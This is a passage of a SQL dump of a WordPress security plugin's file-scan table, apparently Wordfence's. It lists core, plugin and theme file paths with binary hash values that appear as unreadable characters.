�Z�','',0,'?'),('�V9o�C��*R�U��','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php',0,'��U!��s^�7�L','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A^�I���4�B\'','ɗ(�|��m��F�EHS7��^��~#����','',0,'?'),('ꐏF�rH�}@$bF��-','wp-content/plugins/wp-cerber/assets/flags/dz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}����Z�A���','~\n����Ào�\'�x�\0��Xh.��}���%�','',0,'?'),('꤂�,o׫�Co��):','wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',0,'�y^�������','�y^�������','Y	Q�FX��2�2�FW���)���fKSf�','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('���v@T��J�[��','wp-includes/wp-includes/blocks/latest-comments/block.json',0,',�i6��xu0\\����',',�i6��xu0\\����','�s�\"9���l���+���/���[�','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˈ0@�8�����_B','�r�dy��#�G޿����}����ZӦtwW�S','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� ','pX���uc{�-�K׏ژ�/OnE0���)JB','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lGfBp�X0=�aESy','�qǼ<�x��Ӡ�A��X/rUCG�lW�\n*e','',0,'?'),('�8Us� �_��.1Rj','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',0,'�\0��>��@Ue��U','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�)	�>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{`�q���\'2P','Wf�y�����7hc��ajkgd�4��8�ɢ��','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�fS/\\�����R�O�','wp-includes/wp-includes/js/customize-preview-nav-menus.js',0,'m �l�VҪ3���','m �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�u�̽�[�abٌ(��]','wp-includes/wp-includes/formatting.php',0,'��H(@q���Tj��','��H(@q���Tj��','�g��\n?#��\'^�\'d�8�\Zi��=\Z������','',0,'?'),('�{\rՍ.0��`�On��','wp-admin/images/about-header-brushes.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�:Uy-�ܴ#','��{�kZxS?�t\"Q���?�(�n�r3��','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('�w;�@�_6�4StB?','wp-content/themes/shootingstar/css/pie/PIE.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�7��TO���ɲ2�','?���<M��L5�|�`�5bo��߬b�\'fs�','',0,'?'),('�6�\'���� �b','wp-includes/wp-includes/images/smilies/simple-smile.png',0,'�K��{…��f�w�h','�K��{…��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5w�pأ����','3ֳ���}��!p�B����A����)k�{�F�','',0,'?'),('�E��e�6\'j6q�C$','wp-includes/wp-includes/SimplePie/HTTP/Parser.php',0,':p��d\'�$�/',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�L��g�a�J\\','��)��v5i�B�:#��%����N�����','',0,'?'),('���׮F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('�Њtf�P�E+���','wp-includes/wp-includes/js/wp-ajax-response.js',0,'r�Hme_\Z��!5','r�Hme_\Z��!5','��c�����z�2�~;~�D��*T�?�&�','',0,'?'),('��ԖNF��:�1<x�','wp-includes/wp-includes/images/smilies/icon_sad.gif',0,'�Ix�o��TMz��D-','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xS���v�N���','�� u�����yA�Ү�B���(��B6�����','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Iu,�I��WN�7','<�P�ёxC�eo�I)O_d�/�wg�w�1�','',0,'?'),('�+>B\"W T�(z\\�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',0,'N�+C#+|�fZ���]�','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('�+��^�њ��\r�k','wp-content/plugins/wp-cerber/assets/flags/is.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4o�$�^z1�T�ɪ�','�XƠ8�\'��*ӱ4�$���G\"��JD8�@�6','',0,'?'),('������}���,{�','wp-content/themes/shootingstar/template-without-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','71��R�[F�[	�',')�n��o�s�(�`w7X;1I HqPEE�	��{�','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 2󱻱4�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�c�ǝu����7���','wp-includes/wp-includes/Requests/Utility/FilteredIterator.php',0,'�X�!Vs�� �AS�','�X�!Vs�� �AS�','Lq4���Z��յ�H\0�e7f=��\r�\nDC>OV','',0,'?'),('�j���p\'*T��)�ãB','wp-includes/wp-includes/js/customize-preview.js',0,'3Q	�!�@�٧T\r','3Q	�!�@�٧T\r','	�Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�}(^��8,~hyg���','wp-content/plugins/wp-cerber/wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[k�nG���ˡ\"14a','��)Y�.=��E)�#�V W8!E7LOl�','',0,'?'),('�\rǢ.�w\"2�A�V','wp-content/themes/sg-window/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�D��T��^n��	�r','ӭ*]�A5�N����qrV�c/�O���U�j�','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8��	','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�@ަ�$����,','�dٍ|�]���Q��!�Qw����;���`7Zf','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�I5�)��JD��\\','��w5ޏ���+>�c\r����^⽍B�]�','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('�﹍0If��\r?�K','wp-includes/wp-includes/js/dist/server-side-render.min.js',0,'6�o�i)=�\"p�Jhl','6�o�i)=�\"p�Jhl','m��z��}ힳ�M��|N�b����Zi�-','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�\0�Z{���@�C\\�','wp-includes/wp-includes/images/smilies/icon_cool.gif',0,'\n��`����ivj.�','\n��`����ivj.�','�事F�9;2_	�$�$~�LO�a��6���_','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}���nBJw�k�0','��,�In����\n��׋�E,��@�h�1����','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ofl��A�7�A���','�L���9w����v�G�hK!g�n��g�Cd','',0,'?'),('�LX=8�k�jTB]�','wp-includes/wp-includes/js/twemoji.js',0,'ޮ��!�P��+!�x�','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�󗬏','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}d��D��TN�\"F�','F�ԝ�q��`�멾���r_���Ȩ_���\'��I','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"������4XYt[','��m⟮/�a�Ͳ(yMG.��dЪZ+����','',0,'?'),('��mM$�9c��O','wp-content/themes/shootingstar/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P&!���\n�{�s','; =I�o0��u�bֶ� !�G\"��5��KiW��\"','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���9���D?_�7E','��Y]K܊�QS駤��k;�	ͥ�{/ʅ�j�','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Wŝ#���\"Z��Ɣ]E','f?��Y4e��+���~�ěw�K7�w�Mu���','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�֞`�1ٕx�w��','����^���R+Ȝ�I5S$i���\0����2�','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('��f�W�4���%���','wp-content/plugins/wp-cerber/assets/flags/nz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X	�7�7��c.�ujߖl','4ȯYI4�T)��H�;�rd�Q��g���Ӆ','',0,'?'),('��M�B�!:�','wp-content/plugins/wp-cerber/assets/flags/it.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{/�z]�>��F@�B�','ⴟ��k �9b��md6�l�{e� o���','',0,'?'),('��5��Y#�#=q�j','wp-content/themes/sg-window/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jF����Ƒ��e','�L�N��S��!�R\nUU\nJ�v@X2��5�π','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iҎ�L�>�e�*�.��','�+Vƃ/�gyg>��\'$�L*yXc� �w�a5','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\\ƥ�/��','�+�w}�U�K�f�%f�q��荁��im��\Z��','',0,'?'),('��.�}�b8����5i','wp-includes/wp-includes/sodium_compat/src/File.php',0,'c�]-�@W�\\0��Wv','c�]-�@W�\\0��Wv','�c`�C(ߛ�V�S6ب�c�s�u8�6��l','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��s�[0�\n��2-�','a����RC�J)�!�{Mt@�B}�\n�G�5��\0','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��@^�P�\'','#��	��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�$���1��g��,q','wp-includes/wp-includes/block-patterns/two-buttons.php',0,'B���8$�6��v','B���8$�6��v','u���]��$)� ���w���5h1#}��8t�\Z','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ��	\0y','',0,'?'),('�k-§#���^��VU','wp-includes/wp-includes/js/dist/plugins.js',0,'OBb�?�Ɖ�х��','OBb�?�Ɖ�х��','�[��ɉ��NN�^p��D_S��r�pI~8,�v','',0,'?'),('Y��w�;mU5-��','wp-includes/wp-includes/compat.php',0,'	��}�as�	����?�w','	��}�as�	����?�w','��K���yc��TsKfsb{���-	k�X��','',0,'?'),('�d/S\Z�ѝ�w�*D[S','wp-content/themes/sg-window/page-templates/full-contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�mE��\'�\ZY','��iDk�_���\r��m�{�,���!^\\~�?','',0,'?'),('��4س�\n��&S:\r','wp-includes/wp-includes/js/autosave.min.js',0,'��CGs|I�\"�~�}}c','��CGs|I�\"�~�}}c','#��ð�|�d�L��W���kY�W�](�y;�','',0,'?'),('�9fUP	M �P�2u','wp-includes/wp-includes/blocks/tag-cloud.php',0,'�@{�\Z9ڛ���S6��1','�@{�\Z9ڛ���S6��1','��1�ʪ���V�IT/���m�w/(\'��t�+�','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t�	�ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��Q�t�/(�$Dy�','wp-includes/wp-includes/js/codemirror/csslint.js',0,'��M_ϱI����l�','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�>�O^��\"����','͊�Y��V�y���}��&m�{�5jJ)0�!','',0,'?'),('���!�pQ`� G\"�6N�','wp-includes/wp-includes/Requests/Exception/HTTP/503.php',0,'9�RaßC�`\0�UT�','9�RaßC�`\0�UT�','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('� C��͍�ikniA','wp-includes/wp-includes/js/dist/notices.min.js',0,'�����,s\Z���`a','�����,s\Z���`a','e}��䁸7Y|E:E�ڧ�;�m�*cZ��v�Q\r�','',0,'?'),('�H\Z���.���hR�bn','wp-content/plugins/wp-cerber/assets/flags/io.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<���e�e���C�','��ɫ-�)i�l�\na�1��}!�}~����	pd�','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�cRN3���H�����','wp-includes/wp-includes/css/editor-rtl.min.css',0,'��A^�I���4�B\'','��A^�I���4�B\'','ɗ(�|��m��F�EHS7��^��~#����','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('�;��+�&Y��Đ','wp-content/plugins/wp-cerber/assets/multi/multi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/�Wn�U#֬��V�K','��\"��%����6�rH��B)�xf�L]4t��','',0,'?'),('��]1���\Z�>','wp-content/themes/sg-window/inc/widget-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"K�g�o<ˌ�M�','�TvڐYF��6Z<��\'ck��*x��0��','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'���	t���:�Q�o]{5G1����E��','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��S-MؼF�N','m\Z�Lչ����ο�1m�aɤ�Rr�1A7','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��H\nC8h��:��N','I�\r�u}��؁���Yw�Su:<IF���','',0,'?'),('����[�>f4YBSY<�','wp-includes/wp-includes/js/jquery/ui/slider.js',0,'��}�U���Ƥ����','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('��~��t#����<M�=','wp-includes/wp-includes/class-wp-roles.php',0,'��?T�v���|U�y','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�n�?2��a~��','�+p��=���ͨ�\'�Bk���@Cr\'ͺ�\'','',0,'?'),('�㯩�	\'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X%	�<8�g4�','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wz�PQQ�#�Z>\0��D�','���i:��i`�\"��J��%<:���I��xcJ','',0,'?'),('�����r��o�r��','wp-includes/wp-includes/class-wp-customize-section.php',0,'�`;�V�\'���(��)','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �������Q��L','���R21�?nj*=bͥ}�����X&��M��Ʒ','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('���6)Jo*��Nn+','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?с;��9�A����t�\n','�k���O�{d��PS���\0M�\"B]�\"�E��','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P�j�v�˨!ң�','w��9=̠F5d��oU���\\_�k[�','',0,'?'),('�)~�]b6M�p͞s��2','wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js',0,'Y�����2İ\rm}%��','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�@?>�5�����D��','wp-includes/wp-includes/Requests/Response/Headers.php',0,'\Z�ÂҶ�A-��>c�`','\Z�ÂҶ�A-��>c�`','�E�\n�F	�	���M���%{��a���`,�','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�0�	h�mNP���','��LH$G/�bd�+�\0ZP5��Y~�b��20p','',0,'?'),('�U�V5�-�\'�{+W','wp-content/themes/sg-window/sidebar-2-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�9����AT���	','�6\'�S ^��	]����灸9f^��wL�p��[�','',0,'?'),('�UdL�ѣy}���a�','wp-includes/wp-includes/js/jquery/ui/datepicker.min.js',0,'�4}�aX2nH��GWx�{','�4}�aX2nH��GWx�{','/4XAJ\Z����o>V��ꔆ�I����','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[q�7d�v���z�','\'֪��*	[\0EE*J�r�V�s�����c�?','',0,'?'),('�~���:��+sP�/�','wp-includes/wp-includes/Requests/Auth/Basic.php',0,'g��x̄�	4U�	k!C','g��x̄�	4U�	k!C','.�йh�dBiHɀ�n�s����᝗�\\���O','',0,'?'),('���4��3a���7','wp-includes/wp-includes/widgets/class-wp-widget-media-video.php',0,'}◷>y�O�G�','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gG�xN�)�/���*','�%��S�i����x3�k���O��nz]���','',0,'?'),('��R(�R�����D�','wp-includes/wp-includes/css/dist/block-library/theme.css',0,'Gs�Ib<���w]G��','Gs�Ib<���w]G��','כ�ppr��›xI�xP^�?	���N�%�u�','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('��h�R���Y�*A{��','wp-includes/wp-includes/images/spinner-2x.gif',0,'1����2��^#�8��','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('���݋O�^k�E�]�Ar','wp-includes/wp-includes/js/dist/redux-routine.min.js',0,'�;TvCg�)Cb\r','�;TvCg�)Cb\r',';hT�*�ݠO���mVggd�\n�@Pp6{}','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%\'d	\\������sPu�','���o^	��I���_qJ�s��=�-+����','',0,'?'),('�6��e\r~��|l','wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php',0,'Q�-�����*xrf�','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�Z*l3��$�','�B�1ô�	ͥ��5 �Q�������9�J','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�wHɷ ���P�?��','���A��7��}�&��?���%��w�\"���W','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RC7�\n����TR�','v\'S�;��[�\nS�/[S6�&�G&�Ɩ8�','',0,'?'),('�8���םG2��*Ğ�','wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`L�1�Rg<�1�&�','g΀�0��!r�(��)�uT�T^۽S���Vv�','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�\'�;I6��U+�K�','A�Οն<��ލ��&0��>�k]�-GfN�','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���